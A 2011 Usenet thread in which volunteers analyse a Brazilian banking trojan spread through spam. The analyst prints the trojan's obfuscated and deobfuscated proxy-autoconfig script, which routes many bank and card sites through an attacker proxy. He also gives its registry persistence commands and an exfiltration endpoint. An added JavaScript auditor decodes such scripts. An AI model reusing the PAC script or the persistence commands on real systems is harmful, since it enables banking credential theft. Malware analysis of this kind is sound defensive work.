Keep getting emails from live com

They all link to:
microsoft.windowslive.com/*a_long_key
which seems to be a legit M$ domain

Have they been hacked?

Re: Keep getting emails from live com

The clock of life is wound but once,
And no man has the power to tell
Just when the hands will stop
    At late or early hour.
Now is the only time you own,
Live, Love, Toil with a will.
Place no faith in tomorrow,
For the clock may then be Still.

Anon.

Re: Keep getting emails from live com


Re: Keep getting emails from live com

On Fri, 17 Jun 2011 17:23:48 -0300, Shadow wrote:

    It was a trick to get my defenses down. I am now getting exactly
the same messages, this time leading me to a trojan called
www.youtube.com, yeah, with an executable com at the end.
    Tested at virustotal, and jotti, heuristics gets it 5/41
    Uploading to uploadmalware, for David Lipman to analyze.
    []'s

Re: Keep getting emails from live com



Got it - Thanx !

Report to follow.



--
Dave
Multi-AV Scanning Tool - http://www.pctipp.ch/downloads/dl/35905.asp



Re: Keep getting emails from live com



http://www.virustotal.com/file-scan/report.html?id=b8c651dda606a9ba01df96da40b498db2f97062823448846abece932cfae09b2-1308592275

AhnLab-V3 2011.06.21.00 2011.06.20 Trojan/Win32.CSon
AntiVir 7.11.10.40 2011.06.20 DR/Delphi.Gen
BitDefender 7.2 2011.06.20 Gen:Trojan.Heur.niWfr1uQhClGz
CAT-QuickHeal 11.00 2011.06.20 (Suspicious) - DNAScan
ClamAV 0.97.0.0 2011.06.20 PUA.Packed.PECompact-1
DrWeb 5.0.2.03300 2011.06.20 Trojan.DownLoader3.35839
eSafe 7.0.17.0 2011.06.19 Suspicious File
F-Secure 9.0.16440.0 2011.06.20 Gen:Trojan.Heur.niWfr1uQhClGz
GData 22 2011.06.20 Gen:Trojan.Heur.niWfr1uQhClGz
Ikarus T3.1.1.104.0 2011.06.20 Trojan-Dropper.Delf
Kaspersky 9.0.0.837 2011.06.20 Trojan.Win32.Scar.ebmn
McAfee 5.400.0.1158 2011.06.20 Generic.tfr!c
McAfee-GW-Edition 2010.1D 2011.06.20 Heuristic.LooksLike.Win32.Suspicious.C!83
Norman 6.07.10 2011.06.19 W32/Obfuscated.O

gets sbmultimarcas.info/gordinha.pac
Drops:  MkVp.pac

Which has a funky script that starts with (and is only a partial display)...

function FindProxyForURL(url, host)
{
var sbr0x = "P"+""+""+"R"+""+""+"O"+""+""+"X"+""+""+"Y"+""+""+" "+""+""+"2"+""+""+"0"+""+""+"8"+""+""+"."+""+""+"1"+""+""+"1"+""+""+"5"+""+""+"."+""+""+"2"+""+""+"2"+""+""+"4"+""+""+"."+""+""+"2"+""+""+"3"+""+""+"1"+""+""+":"+""+""+"8"+""+""+"0"+""+""+"";

  if (shExpMatch(host,
"b"+""+""+"b"+""+""+"."+""+""+"c"+""+""+"o"+""+""+"m"+""+""+"."+""+""+"b"+""+""+"r"+""+""+""))
{
     return sbr0x;
}

  if (shExpMatch(host,
"w"+""+""+"w"+""+""+"w"+""+""+"."+""+""+"b"+""+""+"b"+""+""+"."+""+""+"c"+""+""+"o"+""+""+"m"+""+""+"."+""+""+"b"+""+""+"r"+""+""+""))
{
     return sbr0x;
}

  if (shExpMatch(host,
"w"+""+""+"w"+""+""+"w"+""+""+"2"+""+""+"."+""+""+"b"+""+""+"b"+""+""+"."+""+""+"c"+""+""+"o"+""+""+"m"+""+""+"."+""+""+"b"+""+""+"r"+""+""+""))
{
     return sbr0x;
}

  if (shExpMatch(host,
"w"+""+""+"w"+""+""+"w"+""+""+"."+""+""+"b"+""+""+"a"+""+""+"n"+""+""+"c"+""+""+"o"+""+""+"d"+""+""+"o"+""+""+"b"+""+""+"r"+""+""+"a"+""+""+"s"+""+""+"i"+""+""+"l"+""+""+"."+""+""+"c"+""+""+"o"+""+""+"m"+""+""+"."+""+""+"b"+""+""+"r"+""+""+""))
{
     return sbr0x;
}




Which evaluates to....

function FindProxyForURL(url, host)
{
var sbr0x = "PROXY 208.115.224.231:80";

  if (shExpMatch(host, "bb.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.bb.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www2.bb.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.bancodobrasil.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "bancodobrasil.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.itau.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "itau.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.bancoitau.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "bancoitau.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.unibanco.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "unibanco.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.uniclass.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "uniclass.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.itauuniclass.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "itauuniclass.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.itaupersonnalite.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "itaupersonnalite.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.itaupersonnalite.com")) {
     return sbr0x;
}

  if (shExpMatch(host, "itaupersonnalite.com")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.americanexpress.com.br ")) {
     return sbr0x;
}

  if (shExpMatch(host, "americanexpress.com.br ")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.americanexpress.com")) {
     return sbr0x;
}

  if (shExpMatch(host, "americanexpress.com")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.credicard.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "credicard.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.caixa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "caixa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.caixa.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "caixa.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.caixaeconomica.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "caixaeconomica.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.caixaeconomica.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "caixaeconomica.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.caixaeconomicafederal.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "caixaeconomicafederal.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.cef.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "cef.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.cef.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "cef.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.bradesco.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "bradesco.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.bradescoprime.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "bradescoprime.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.prime.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "prime.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "bradesco.com")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.bradesco.com")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.bradescopj.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "bradescopj.com.br")) {
     return sbr0x;
}


 if (shExpMatch(host, "www.bancoreal.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "bancoreal.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.real.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "real.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.santander.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "santander.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.banespa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "banespa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.santanderbanespa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "santanderbanespa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.banrisul.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "banrisul.com.br")) {
     return sbr0x;
}
 if (shExpMatch(host, "banrisul.com")) {
     return sbr0x;
}
 if (shExpMatch(host, "www.banrisul.com")) {
     return sbr0x;

}
 if (shExpMatch(host, "www.americanexpress.com.br")) {
     return sbr0x;

}
 if (shExpMatch(host, "americanexpress.com.br")) {
     return sbr0x;
}
 if (shExpMatch(host, "www.americanexpress.com")) {
     return sbr0x;

}
 if (shExpMatch(host, "americanexpress.com")) {
     return sbr0x;

}
 return "DIRECT";
}



Creates a copy of itself (www.youtube.com, which is an EXE executable renamed to .com) to:
C:\Unnisttall.exe

Execute:
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v CIPA /d C:\Unnisttall.exe /t REG_SZ /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion /v VIPA /d C:\Unnisttall.exe /t REG_SZ /f

Mutex:
OneCopyMutex

Posts data to...

64.31.58.228/gh.php


--
Dave
Multi-AV Scanning Tool - http://www.pctipp.ch/downloads/dl/35905.asp
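An added example, not Dave's analysis and not code from the thread: a small PAC auditor in JavaScript that collapses the "P"+""+""+"R" concatenation obfuscation shown above and then asks the script itself which hosts it would hand to a PROXY instead of returning DIRECT. The embedded sample PAC, its proxy address (TEST-NET 192.0.2.1) and its host names are constructed placeholders.

```javascript
// Added example (not code from the thread): audit a PAC file of the shape Dave
// posted by undoing the "P"+""+""+"R" concatenation, then running the PAC's own
// FindProxyForURL to list hosts that would be sent to a proxy. The sample PAC,
// proxy address (TEST-NET 192.0.2.1) and host names are constructed placeholders.

// Collapse chains like "a"+""+""+"b" into "ab". Repeats until nothing changes,
// since each pass only joins adjacent pairs. Heuristic for this obfuscation
// shape: it assumes no string literal contains a quote or backslash.
function deobfuscateConcat(src) {
  let prev;
  do {
    prev = src;
    src = src.replace(/"([^"\\]*)"\s*\+\s*"([^"\\]*)"/g, (_, a, b) => `"${a}${b}"`);
  } while (src !== prev);
  return src;
}

// PAC's shExpMatch: a shell-style glob ('*' and '?') that must match the
// whole string, so "bb.com.br" does not match "www.bb.com.br".
function shExpMatch(str, pattern) {
  const body = pattern.replace(/[.+^${}()|[\]\\]/g, "\\$&")
                      .replace(/\*/g, ".*").replace(/\?/g, ".");
  return new RegExp("^" + body + "$").test(str);
}

// Run the deobfuscated PAC's FindProxyForURL for each host with only
// shExpMatch in scope, and return the hosts whose verdict is not "DIRECT".
function proxiedHosts(pacSource, hosts) {
  const clean = deobfuscateConcat(pacSource);
  const findProxy = new Function("shExpMatch", clean + "\nreturn FindProxyForURL;")(shExpMatch);
  const out = {};
  for (const h of hosts) {
    const verdict = findProxy("http://" + h + "/", h);
    if (verdict !== "DIRECT") out[h] = verdict;
  }
  return out;
}

// Constructed sample PAC using the same obfuscation as the one in the thread.
const SAMPLE_PAC = `function FindProxyForURL(url, host)
{
var sbr0x = "P"+""+""+"R"+""+""+"O"+""+""+"X"+""+""+"Y"+""+""+" "+""+""+"1"+""+""+"9"+""+""+"2"+""+""+"."+""+""+"0"+""+""+"."+""+""+"2"+""+""+"."+""+""+"1"+""+""+":"+""+""+"8"+""+""+"0"+""+""+"";
  if (shExpMatch(host, "w"+""+""+"w"+""+""+"w"+""+""+"."+""+""+"b"+""+""+"a"+""+""+"n"+""+""+"k"+""+""+"."+""+""+"e"+""+""+"x"+""+""+"a"+""+""+"m"+""+""+"p"+""+""+"l"+""+""+"e"+""+""+"")) { return sbr0x; }
  if (shExpMatch(host, "b"+""+"a"+""+"n"+""+"k"+""+"."+""+"e"+""+"x"+""+"a"+""+"m"+""+"p"+""+"l"+""+"e")) { return sbr0x; }
  return "DIRECT";
}`;

function auditSamplePac() {
  return proxiedHosts(SAMPLE_PAC, ["www.bank.example", "bank.example", "example.org"]);
}
```

Any host that comes back with a PROXY verdict from a PAC you did not configure is the thing to investigate; a legitimate corporate PAC rarely singles out bank hostnames.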



Re: Keep getting emails from live com

On Mon, 20 Jun 2011 14:30:32 -0400, "David H. Lipman"

... something or other, but all I got was:


Was there supposed to be malware in that?

--
Rich Webb     Norfolk, VA

Re: Keep getting emails from live com



There was no malware in that.  Presumably Avast didn't like the de-obfuscated script.  A script that could not cause any harm in the body of my post.



--
Dave
Multi-AV Scanning Tool - http://www.pctipp.ch/downloads/dl/35905.asp



Re: Keep getting emails from live com

On Mon, 20 Jun 2011 15:21:33 -0400, "David H. Lipman"


Roger that. Thought it was better to ask just in case it wasn't a false
positive, given how easily From lines can be spoofed. FWIW, the Avast
alert was "JS: Banker-P [Trj]."

--
Rich Webb     Norfolk, VA

Re: Keep getting emails from live com



Quite apropos label, since if you examine the script it does have to do with banks, specifically Brazilian ones, and it was deobfuscated from an obfuscated Javascript.



--
Dave
Multi-AV Scanning Tool - http://www.pctipp.ch/downloads/dl/35905.asp



Re: Keep getting emails from live com

On Mon, 20 Jun 2011 14:30:32 -0400, "David H. Lipman"

    Well, it's good to know more AV's recognize it.
    Trojan banker, via proxy.
    Has just about every Brazilian bank I've ever heard of on the list.
    Thanks
    []'s

Re: Keep getting emails from live com




YW ;-)

--
Dave
Multi-AV Scanning Tool - http://www.pctipp.ch/downloads/dl/35905.asp


